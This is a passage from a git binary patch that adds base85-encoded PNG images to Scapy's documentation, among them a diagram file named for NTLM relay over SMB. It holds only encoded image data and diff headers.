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 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_smb_win2.png b/doc/scapy/graphics/ntlm/ntlmrelay_smb_win2.png new file mode 100644 index 0000000000000000000000000000000000000000..eb2e7e759d324106fbd9abb7e37bbfaa4aefe748 GIT binary patch literal 60780 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 